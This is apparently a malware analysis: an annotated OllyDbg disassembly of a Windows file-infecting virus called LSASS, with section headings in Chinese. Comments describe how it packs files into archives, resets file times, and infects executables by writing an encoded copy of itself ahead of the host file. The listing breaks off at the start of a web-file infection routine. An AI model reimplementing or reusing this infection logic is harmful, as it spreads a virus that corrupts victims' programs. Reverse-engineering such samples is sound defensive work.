00402892 |> 8D45 D8 |LEA EAX,DWORD PTR SS:[EBP-28]

00402895 |. 50 |PUSH EAX

00402896 |. 8D85 78FFFFFF |LEA EAX,DWORD PTR SS:[EBP-88]

0040289C |. 68 6CD14000 |PUSH LSASS.0040D16C ; ASCII " A ""

004028A1 |. 50 |PUSH EAX

004028A2 |. E8 8D5D0000 |CALL <JMP.&MFC42.#926_??H@YG?AVCString@@PBDABV0@@Z>

004028A7 |. 68 88D14000 |PUSH LSASS.0040D188 ; ASCII "" ""

004028AC |. 50 |PUSH EAX

004028AD |. 8D45 80 |LEA EAX,DWORD PTR SS:[EBP-80]

004028B0 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20

004028B4 |. 50 |PUSH EAX

004028B5 |. E8 745D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004028BA |. 8D4D DC |LEA ECX,DWORD PTR SS:[EBP-24]

004028BD |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21

004028C1 |. 51 |PUSH ECX

004028C2 |. 50 |PUSH EAX

004028C3 |. 8D45 88 |LEA EAX,DWORD PTR SS:[EBP-78]

004028C6 |. 50 |PUSH EAX

004028C7 |. E8 5C5D0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

004028CC |. 68 44D14000 |PUSH LSASS.0040D144 ; ASCII "*.*" -r -inul -ibck -y -m0 -df -ep -ep1"

004028D1 |. 50 |PUSH EAX

004028D2 |. 8D45 90 |LEA EAX,DWORD PTR SS:[EBP-70]

004028D5 |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22

004028D9 |. 50 |PUSH EAX

004028DA |. E8 4F5D0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

004028DF |. 50 |PUSH EAX

004028E0 |. 8D4D D4 |LEA ECX,DWORD PTR SS:[EBP-2C]

004028E3 |. C645 FC 23 |MOV BYTE PTR SS:[EBP-4],23

004028E7 |. E8 365D0000 |CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

004028EC |. 8D4D 90 |LEA ECX,DWORD PTR SS:[EBP-70]

004028EF |. C645 FC 22 |MOV BYTE PTR SS:[EBP-4],22

004028F3 |. E8 045C0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004028F8 |. 8D4D 88 |LEA ECX,DWORD PTR SS:[EBP-78]

004028FB |. C645 FC 21 |MOV BYTE PTR SS:[EBP-4],21

004028FF |. E8 F85B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402904 |. 8D4D 80 |LEA ECX,DWORD PTR SS:[EBP-80]

00402907 |. C645 FC 20 |MOV BYTE PTR SS:[EBP-4],20

0040290B |. E8 EC5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402910 |. 8D8D 78FFFFFF |LEA ECX,DWORD PTR SS:[EBP-88]

00402916 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

0040291A |. E8 DD5B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

0040291F |. 8B85 00FEFFFF |MOV EAX,DWORD PTR SS:[EBP-200]

00402925 |. 53 |PUSH EBX

00402926 |. 8945 98 |MOV DWORD PTR SS:[EBP-68],EAX

00402929 |. 8B85 04FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1FC]

0040292F |. 8945 9C |MOV DWORD PTR SS:[EBP-64],EAX

00402932 |. 8B85 F8FDFFFF |MOV EAX,DWORD PTR SS:[EBP-208]

00402938 |. 8945 B0 |MOV DWORD PTR SS:[EBP-50],EAX

0040293B |. 8B85 FCFDFFFF |MOV EAX,DWORD PTR SS:[EBP-204]

00402941 |. 8945 B4 |MOV DWORD PTR SS:[EBP-4C],EAX

00402944 |. 8B85 08FEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F8]

0040294A |. 8945 A4 |MOV DWORD PTR SS:[EBP-5C],EAX

0040294D |. 8B85 0CFEFFFF |MOV EAX,DWORD PTR SS:[EBP-1F4]

00402953 |. 51 |PUSH ECX

00402954 |. 8945 A8 |MOV DWORD PTR SS:[EBP-58],EAX

00402957 |. 8D8D 20FEFFFF |LEA ECX,DWORD PTR SS:[EBP-1E0]

0040295D |. 8BC4 |MOV EAX,ESP

0040295F |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402962 |. 51 |PUSH ECX

00402963 |. 8D4D 08 |LEA ECX,DWORD PTR SS:[EBP+8]

00402966 |. 51 |PUSH ECX

00402967 |. 50 |PUSH EAX

00402968 |. E8 C15C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

0040296D |. E8 4FF4FFFF |CALL LSASS.00401DC1

00402972 |. 59 |POP ECX

00402973 |. 8D45 D4 |LEA EAX,DWORD PTR SS:[EBP-2C]

00402976 |. 59 |POP ECX

00402977 |. 50 |PUSH EAX

00402978 |. 8D86 A6010000 |LEA EAX,DWORD PTR DS:[ESI+1A6]

0040297E |. 50 |PUSH EAX

0040297F |. 8D85 70FFFFFF |LEA EAX,DWORD PTR SS:[EBP-90]

00402985 |. 50 |PUSH EAX

00402986 |. E8 9D5C0000 |CALL <JMP.&MFC42.#922_??H@YG?AVCString@@ABV0@0@Z>

0040298B |. FF30 |PUSH DWORD PTR DS:[EAX] ; /src

0040298D |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

00402993 |. 50 |PUSH EAX ; |dest

00402994 |. E8 735D0000 |CALL <JMP.&MSVCRT.strcpy> ; /strcpy

00402999 |. 59 |POP ECX

0040299A |. 59 |POP ECX

0040299B |. 8D8D 70FFFFFF |LEA ECX,DWORD PTR SS:[EBP-90]

004029A1 |. E8 565B0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004029A6 |. 53 |PUSH EBX ; /Arg5

004029A7 |. 53 |PUSH EBX ; |Arg4

004029A8 |. 8D85 50EAFFFF |LEA EAX,DWORD PTR SS:[EBP-15B0] ; |

004029AE |. 53 |PUSH EBX ; |Arg3

004029AF |. 50 |PUSH EAX ; |Arg2

004029B0 |. 53 |PUSH EBX ; |Arg1

004029B1 |. 8BCE |MOV ECX,ESI ; |

004029B3 |. E8 433F0000 |CALL LSASS.004068FB ; /LSASS.004068FB

004029B8 |. 85C0 |TEST EAX,EAX ; pack rar/zip file

004029BA |. 75 5D |JNZ SHORT LSASS.00402A19

004029BC |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

004029BF |. E8 445B0000 |CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>

004029C4 |. 68 40D14000 |PUSH LSASS.0040D140 ; ASCII "ddd"

004029C9 |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

004029CC |. C645 FC 24 |MOV BYTE PTR SS:[EBP-4],24

004029D0 |. E8 475C0000 |CALL <JMP.&MFC42.#860_??4CString@@QAEABV0@PBD@Z>

004029D5 |. 53 |PUSH EBX ; /hTemplateFile

004029D6 |. 68 80000000 |PUSH 80 ; |Attributes = NORMAL

004029DB |. 6A 03 |PUSH 3 ; |Mode = OPEN_EXISTING

004029DD |. 53 |PUSH EBX ; |pSecurity

004029DE |. 6A 03 |PUSH 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

004029E0 |. 68 000000C0 |PUSH C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE

004029E5 |. FF75 D8 |PUSH DWORD PTR SS:[EBP-28] ; |FileName

004029E8 |. FF15 E8A04000 |CALL DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; /CreateFileA

004029EE |. 8D4D A4 |LEA ECX,DWORD PTR SS:[EBP-5C]

004029F1 |. 8945 E4 |MOV DWORD PTR SS:[EBP-1C],EAX

004029F4 |. 51 |PUSH ECX ; /pLastWrite

004029F5 |. 8D4D 98 |LEA ECX,DWORD PTR SS:[EBP-68] ; |

004029F8 |. 51 |PUSH ECX ; |pLastAccess

004029F9 |. 8D4D B0 |LEA ECX,DWORD PTR SS:[EBP-50] ; |

004029FC |. 51 |PUSH ECX ; |pCreationTime

004029FD |. 50 |PUSH EAX ; |hFile

004029FE |. FF15 14A14000 |CALL DWORD PTR DS:[<&KERNEL32.SetFileTime>] ; /SetFileTime

00402A04 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C] ; /hObject

00402A07 |. FF15 74A04000 |CALL DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; /CloseHandle

00402A0D |. 8D4D C0 |LEA ECX,DWORD PTR SS:[EBP-40]

00402A10 |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402A14 |. E8 E35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402A19 |> 68 94D14000 |PUSH LSASS.0040D194 ; ASCII "/bak/"

00402A1E |. 8D85 68FFFFFF |LEA EAX,DWORD PTR SS:[EBP-98]

00402A24 |. 57 |PUSH EDI

00402A25 |. 50 |PUSH EAX

00402A26 |. E8 035C0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402A2B |. 51 |PUSH ECX

00402A2C |. 8D95 20FEFFFF |LEA EDX,DWORD PTR SS:[EBP-1E0]

00402A32 |. 8BCC |MOV ECX,ESP

00402A34 |. 8965 BC |MOV DWORD PTR SS:[EBP-44],ESP

00402A37 |. 52 |PUSH EDX

00402A38 |. 50 |PUSH EAX

00402A39 |. 51 |PUSH ECX

00402A3A |. C645 FC 25 |MOV BYTE PTR SS:[EBP-4],25

00402A3E |. E8 EB5B0000 |CALL <JMP.&MFC42.#924_??H@YG?AVCString@@ABV0@PBD@Z>

00402A43 |. 8BCE |MOV ECX,ESI

00402A45 |. E8 97F3FFFF |CALL LSASS.00401DE1

00402A4A |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402A4E |. 8D8D 68FFFFFF |LEA ECX,DWORD PTR SS:[EBP-98]

00402A54 |> E8 A35A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402A59 |. FF8E AA010000 |DEC DWORD PTR DS:[ESI+1AA]

00402A5F |. EB 69 |JMP SHORT LSASS.00402ACA

00402A61 |> 81BD 14FEFFFF 00>|CMP DWORD PTR SS:[EBP-1EC],19000

00402A6B |. 73 5D |JNB SHORT LSASS.00402ACA

...

00402ABB |. C645 FC 0A |MOV BYTE PTR SS:[EBP-4],0A

00402ABF |. 8D8D 60FFFFFF |LEA ECX,DWORD PTR SS:[EBP-A0]

00402AC5 |> E8 325A0000 |CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

00402ACA |> 8D85 F4FDFFFF |LEA EAX,DWORD PTR SS:[EBP-20C]

00402AD0 |. 50 |PUSH EAX ; /pFindFileData

00402AD1 |. FF75 B8 |PUSH DWORD PTR SS:[EBP-48] ; |hFile

00402AD4 |. FF15 FCA04000 |CALL DWORD PTR DS:[<&KERNEL32.FindNextFileA>] ; /FindNextFileA

00402ADA |. 85C0 |TEST EAX,EAX

00402ADC |.^ 0F85 52F7FFFF /JNZ LSASS.00402234

00402AE2 |. FF75 B8 PUSH DWORD PTR SS:[EBP-48] ; /hSearch

00402AE5 |. FF15 F8A04000 CALL DWORD PTR DS:[<&KERNEL32.FindClose>] ; /FindClose

2 感染exe文件的函数

00406348 /$ B8 94934000 MOV EAX,LSASS.00409394 ; exe file infect function

0040634D |. E8 AE230000 CALL <JMP.&MSVCRT._EH_prolog>

00406352 |. 83EC 3C SUB ESP,3C

00406355 |. 53 PUSH EBX

00406356 |. 56 PUSH ESI

00406357 |. 8BF1 MOV ESI,ECX

00406359 |. 57 PUSH EDI

0040635A |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

0040635D |. E8 A6210000 CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>

00406362 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0

00406366 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]

0040636C |. 50 PUSH EAX

0040636D |. 8D8E 6C010000 LEA ECX,DWORD PTR DS:[ESI+16C]

00406373 |. E8 AA220000 CALL <JMP.&MFC42.#858_??4CString@@QAEABV0@ABV0@@Z>

00406378 |. 8D45 B8 LEA EAX,DWORD PTR SS:[EBP-48]

0040637B |. 8D7E 68 LEA EDI,DWORD PTR DS:[ESI+68]

0040637E |. 50 PUSH EAX ; /statbuf

0040637F |. 57 PUSH EDI ; |path

00406380 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat

00406386 |. 8B45 CC MOV EAX,DWORD PTR SS:[EBP-34] ; get file com/lsass.exe base info

00406389 |. 59 POP ECX

0040638A |. 85C0 TEST EAX,EAX

0040638C |. 59 POP ECX

0040638D |. A3 3CD04000 MOV DWORD PTR DS:[40D03C],EAX

00406392 |. 75 07 JNZ SHORT LSASS.0040639B

00406394 |> 32DB XOR BL,BL

00406396 |. E9 13010000 JMP LSASS.004064AE

0040639B |> 50 PUSH EAX ; /size

0040639C |. FF15 88A34000 CALL DWORD PTR DS:[<&MSVCRT.malloc>] ; /malloc

004063A2 |. 85C0 TEST EAX,EAX ; allocate a memory

004063A4 |. 59 POP ECX

004063A5 |. 8986 70010000 MOV DWORD PTR DS:[ESI+170],EAX ; buf

004063AB |.^ 74 E7 JE SHORT LSASS.00406394

004063AD |. 68 E8D14000 PUSH LSASS.0040D1E8 ; /mode = "rb"

004063B2 |. 57 PUSH EDI ; |path

004063B3 |. 8B3D 84A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fopen>] ; |msvcrt.fopen

004063B9 |. FFD7 CALL EDI ; /fopen

004063BB |. 59 POP ECX ; open file com/lsass.exe

004063BC |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX

004063BF |. 85C0 TEST EAX,EAX

004063C1 |. 59 POP ECX

004063C2 |. 0F84 D7000000 JE LSASS.0040649F ; read file com/lsass.exe to buf

004063C8 |. 50 PUSH EAX ; /stream

004063C9 |. 8B1D 8CA34000 MOV EBX,DWORD PTR DS:[<&MSVCRT.fread>] ; |msvcrt.fread

004063CF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; |n = 27004 (159748.)

004063D5 |. 6A 01 PUSH 1 ; |size = 1

004063D7 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |buf

004063DD |. FFD3 CALL EBX ; /fread

004063DF |. FF75 E0 PUSH DWORD PTR SS:[EBP-20] ; /stream

004063E2 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX ; |

004063E5 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose

004063EB |. 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] ; close file handle

004063EE |. 83C4 14 ADD ESP,14

004063F1 |. 3B05 3CD04000 CMP EAX,DWORD PTR DS:[40D03C]

004063F7 |. 0F85 A2000000 JNZ LSASS.0040649F

004063FD |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174]

00406403 |. 8D4D B8 LEA ECX,DWORD PTR SS:[EBP-48]

00406406 |. 51 PUSH ECX ; /statbuf

00406407 |. 50 PUSH EAX ; |path

00406408 |. FF15 80A34000 CALL DWORD PTR DS:[<&MSVCRT._stat>] ; /_stat

0040640E |. 59 POP ECX ; get need infect file base info to statbuf

0040640F |. 85C0 TEST EAX,EAX

00406411 |. 59 POP ECX

00406412 |. 0F85 74020000 JNZ LSASS.0040668C

00406418 |. 3945 CC CMP DWORD PTR SS:[EBP-34],EAX

0040641B |. 0F84 6B020000 JE LSASS.0040668C

00406421 |. 8BCE MOV ECX,ESI

00406423 |. E8 DA020000 CALL LSASS.00406702 ; LoadResource here

00406428 |. 84C0 TEST AL,AL

0040642A |. 74 73 JE SHORT LSASS.0040649F

0040642C |. 8B86 74010000 MOV EAX,DWORD PTR DS:[ESI+174] ; the file can be infected

00406432 |. 68 E8D14000 PUSH LSASS.0040D1E8 ; ASCII "rb"

00406437 |. 50 PUSH EAX

00406438 |. FFD7 CALL EDI ; open need infect file

0040643A |. 59 POP ECX ; file path

0040643B |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; need infect file handle

0040643E |. 85C0 TEST EAX,EAX

00406440 |. 59 POP ECX

00406441 |. 74 5C JE SHORT LSASS.0040649F

00406443 |. 51 PUSH ECX

00406444 |. 8D86 74010000 LEA EAX,DWORD PTR DS:[ESI+174]

0040644A |. 8BCC MOV ECX,ESP

0040644C |. 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP

0040644F |. 50 PUSH EAX

00406450 |. E8 B5210000 CALL <JMP.&MFC42.#535_??0CString@@QAE@ABV0@@Z>

00406455 |. E8 2ECCFFFF CALL LSASS.00403088 ; check file whether is infected function

0040645A |. 84C0 TEST AL,AL

0040645C |. 59 POP ECX

0040645D |. 74 1B JE SHORT LSASS.0040647A ; jmp if can infected

0040645F |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406465 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

0040646B |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream

0040646E |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; /fclose

00406474 |. 59 POP ECX

00406475 |. B3 01 MOV BL,1

00406477 |. 59 POP ECX

00406478 |. EB 34 JMP SHORT LSASS.004064AE

0040647A |> 6A 00 PUSH 0 ; /whence = SEEK_SET

0040647C |. 6A 00 PUSH 0 ; |offset = 0

0040647E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |stream

00406481 |. FF15 44A34000 CALL DWORD PTR DS:[<&MSVCRT.fseek>] ; /fseek

00406487 |. 8B86 7C010000 MOV EAX,DWORD PTR DS:[ESI+17C] ; set need file ptr as 0

0040648D |. 68 D8DD4000 PUSH LSASS.0040DDD8 ; ASCII "wb"

00406492 |. 50 PUSH EAX ; create a temporary file: system32/com/~

00406493 |. FFD7 CALL EDI ; fopen

00406495 |. 83C4 14 ADD ESP,14

00406498 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX ; com/~ handle

0040649B |. 85C0 TEST EAX,EAX

0040649D |. 75 22 JNZ SHORT LSASS.004064C1

0040649F |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

004064A5 |. 32DB XOR BL,BL ; |

004064A7 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

004064AD |. 59 POP ECX

004064AE |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF

004064B2 |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

004064B5 |. E8 42200000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004064BA |. 8AC3 MOV AL,BL

004064BC |. E9 E6010000 JMP LSASS.004066A7

004064C1 |> 50 PUSH EAX ; /write self-virus file to temporary file(com/~)

004064C2 |. 8B3D 48A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fwrite>] ; |msvcrt.fwrite

004064C8 |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] ; |n

004064CB |. 6A 01 PUSH 1 ; |size = 1

004064CD |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; |ptr

004064D3 |. FFD7 CALL EDI ; /fwrite

004064D5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

004064D8 |. 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX

004064DB |. 8D45 CC LEA EAX,DWORD PTR SS:[EBP-34]

004064DE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~

004064E0 |. 6A 01 PUSH 1

004064E2 |. 50 PUSH EAX

004064E3 |. FFD7 CALL EDI ; fwrite

004064E5 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

004064E8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX

004064EB |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]

004064EE |. 6A 04 PUSH 4 ; write 4 bytes to file com/~

004064F0 |. 6A 01 PUSH 1

004064F2 |. 50 PUSH EAX

004064F3 |. FFD7 CALL EDI ; fwrite

004064F5 |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; filestream

004064F8 |. 0145 E8 ADD DWORD PTR SS:[EBP-18],EAX

004064FB |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1

004064FF |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read all need infect file

00406505 |. 6A 01 PUSH 1

00406507 |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; rBuf

0040650D |. FFD3 CALL EBX ; fread

0040650F |. 83C4 40 ADD ESP,40 ;

00406512 |> 85C0 /TEST EAX,EAX ; EXA initial value = 0x1c000(need infect file

size)

00406514 |. 0F84 8B000000 |JE LSASS.004065A5

0040651A |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0 ; flag

0040651E |. 74 59 |JE SHORT LSASS.00406579

00406520 |. 8B0D 30D04000 |MOV ECX,DWORD PTR DS:[40D030] ; save inital postion to ECX

00406526 |. 83C1 09 |ADD ECX,9 ; ECX += 9; 224

00406529 |> 3B0D 3CD04000 |/CMP ECX,DWORD PTR DS:[40D03C]

0040652F |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX

00406532 |. 73 16 ||JNB SHORT LSASS.0040654A ; if ECX > [40D03C](self-virus size) then jmp;

00406534 |. 8B96 70010000 ||MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file

0040653A |. 03CA ||ADD ECX,EDX

0040653C |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]

0040653E |. F6D2 ||NOT DL

00406540 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; modified, then save back

00406542 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp

00406545 |. 83C1 0B ||ADD ECX,0B ; ECX += 0x0B; offset = 0x0B

00406548 |.^ EB DF |/JMP SHORT LSASS.00406529

0040654A |> 33C9 |XOR ECX,ECX ; ECX = 0;

0040654C |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX

00406552 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;

00406555 |. 76 1E |JBE SHORT LSASS.00406575 ; if [40D03C] <= ECX then jmp;

00406557 |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170] ; inital postion is first byte of need infect file

0040655D |. 03CA ||ADD ECX,EDX ; ECX += EDX;

0040655F |. 8A11 ||MOV DL,BYTE PTR DS:[ECX] ; get [ECX]

00406561 |. F6D2 ||NOT DL

00406563 |. 8811 ||MOV BYTE PTR DS:[ECX],DL ; midified, then save back

00406565 |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14] ; ECX = dwTmp;

00406568 |. 41 ||INC ECX

00406569 |. 41 ||INC ECX ; ECX += 2;

0040656A |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]

00406570 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX ; dwTmp = ECX;

00406573 |.^ 72 E2 |/JB SHORT LSASS.00406557 ; if ECX < [40D03C](self-virus size) then jmp

(continue decode);

00406575 |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0 ; then decode over, write to temporary file

00406579 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20] ; write to file com/~

0040657C |. 50 |PUSH EAX

0040657D |. 6A 01 |PUSH 1

0040657F |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

00406585 |. FFD7 |CALL EDI ; fwrite

00406587 |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]

0040658A |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX

0040658D |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]

00406593 |. 6A 01 |PUSH 1

00406595 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

0040659B |. FFD3 |CALL EBX ; fread

0040659D |. 83C4 20 |ADD ESP,20

004065A0 |.^ E9 6DFFFFFF /JMP LSASS.00406512

004065A5 |> FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; |/stream

004065A8 |. FF15 90A34000 CALL DWORD PTR DS:[<&MSVCRT.fclose>] ; |/fclose

004065AE |. 8B86 78010000 MOV EAX,DWORD PTR DS:[ESI+178] ; |

004065B4 |. C70424 E8D14000 MOV DWORD PTR SS:[ESP],LSASS.0040D1E8 ; |ASCII "rb"

004065BB |. 50 PUSH EAX ; |path

004065BC |. FF15 84A34000 CALL DWORD PTR DS:[<&MSVCRT.fopen>] ; /fopen

004065C2 |. 59 POP ECX ; open com/lsass.exe

004065C3 |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX ; handle

004065C6 |. 85C0 TEST EAX,EAX

004065C8 |. 59 POP ECX

004065C9 |. 0F84 BD000000 JE LSASS.0040668C

004065CF |. 50 PUSH EAX

004065D0 |. C645 F3 01 MOV BYTE PTR SS:[EBP-D],1

004065D4 |. FF35 3CD04000 PUSH DWORD PTR DS:[40D03C] ; read com/lsass.exe all

004065DA |. 6A 01 PUSH 1

004065DC |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170]

004065E2 |. FFD3 CALL EBX ; fread

004065E4 |. 83C4 10 ADD ESP,10

004065E7 |> 85C0 /TEST EAX,EAX

004065E9 |. 74 5E |JE SHORT LSASS.00406649

004065EB |. 807D F3 00 |CMP BYTE PTR SS:[EBP-D],0

004065EF |. 74 2F |JE SHORT LSASS.00406620

004065F1 |. 33C9 |XOR ECX,ECX

004065F3 |. 390D 3CD04000 |CMP DWORD PTR DS:[40D03C],ECX

004065F9 |. 894D EC |MOV DWORD PTR SS:[EBP-14],ECX

004065FC |. 76 1E |JBE SHORT LSASS.0040661C

004065FE |> 8B96 70010000 |/MOV EDX,DWORD PTR DS:[ESI+170]

00406604 |. 03CA ||ADD ECX,EDX

00406606 |. 8A11 ||MOV DL,BYTE PTR DS:[ECX]

00406608 |. F6D2 ||NOT DL

0040660A |. 8811 ||MOV BYTE PTR DS:[ECX],DL

0040660C |. 8B4D EC ||MOV ECX,DWORD PTR SS:[EBP-14]

0040660F |. 41 ||INC ECX

00406610 |. 41 ||INC ECX

00406611 |. 3B0D 3CD04000 ||CMP ECX,DWORD PTR DS:[40D03C]

00406617 |. 894D EC ||MOV DWORD PTR SS:[EBP-14],ECX

0040661A |.^ 72 E2 |/JB SHORT LSASS.004065FE

0040661C |> 8065 F3 00 |AND BYTE PTR SS:[EBP-D],0

00406620 |> FF75 E0 |PUSH DWORD PTR SS:[EBP-20]

00406623 |. 50 |PUSH EAX

00406624 |. 6A 01 |PUSH 1

00406626 |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

0040662C |. FFD7 |CALL EDI ; fwrite

0040662E |. FF75 E4 |PUSH DWORD PTR SS:[EBP-1C]

00406631 |. 0145 E8 |ADD DWORD PTR SS:[EBP-18],EAX

00406634 |. FF35 3CD04000 |PUSH DWORD PTR DS:[40D03C]

0040663A |. 6A 01 |PUSH 1

0040663C |. FFB6 70010000 |PUSH DWORD PTR DS:[ESI+170]

00406642 |. FFD3 |CALL EBX ; fread, read next

00406644 |. 83C4 20 |ADD ESP,20

00406647 |.^ EB 9E /JMP SHORT LSASS.004065E7

00406649 |> FF75 E0 PUSH DWORD PTR SS:[EBP-20]

0040664C |. 8B0D 3CD04000 MOV ECX,DWORD PTR DS:[40D03C]

00406652 |. 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]

00406655 |. 6A 04 PUSH 4

00406657 |. 6A 01 PUSH 1

00406659 |. 50 PUSH EAX

0040665A |. 8908 MOV DWORD PTR DS:[EAX],ECX

0040665C |. FFD7 CALL EDI

0040665E |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] ; /stream

00406661 |. 8B3D 90A34000 MOV EDI,DWORD PTR DS:[<&MSVCRT.fclose>] ; |msvcrt.fclose

00406667 |. FFD7 CALL EDI ; /fclose

00406669 |. FF75 E0 PUSH DWORD PTR SS:[EBP-20]

0040666C |. FFD7 CALL EDI

0040666E |. FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406674 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

0040667A |. 83C4 1C ADD ESP,1C

0040667D |. FF05 04F44000 INC DWORD PTR DS:[40F404]

00406683 |. C686 B3010000 01 MOV BYTE PTR DS:[ESI+1B3],1

0040668A |. EB 0D JMP SHORT LSASS.00406699

0040668C |> FFB6 70010000 PUSH DWORD PTR DS:[ESI+170] ; /block

00406692 |. FF15 94A34000 CALL DWORD PTR DS:[<&MSVCRT.free>] ; /free

00406698 |. 59 POP ECX

00406699 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF

0040669D |. 8D4D DC LEA ECX,DWORD PTR SS:[EBP-24]

004066A0 |. E8 571E0000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>

004066A5 |. 32C0 XOR AL,AL

004066A7 |> 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]

004066AA |. 5F POP EDI

004066AB |. 5E POP ESI

004066AC |. 64:890D 00000000 MOV DWORD PTR FS:[0],ECX

004066B3 |. 5B POP EBX

004066B4 |. C9 LEAVE

004066B5 /. C3 RETN

3 web文件感染函数

00402B97 /$ B8 41904000 MOV EAX,LSASS.00409041 ; web file infect function

00402B9C |. E8 5F5B0000 CALL <JMP.&MSVCRT._EH_prolog>

00402BA1 |. 81EC 60040000 SUB ESP,460

00402BA7 |. 53 PUSH EBX

00402BA8 |. 56 PUSH ESI

00402BA9 |. 8BF1 MOV ESI,ECX

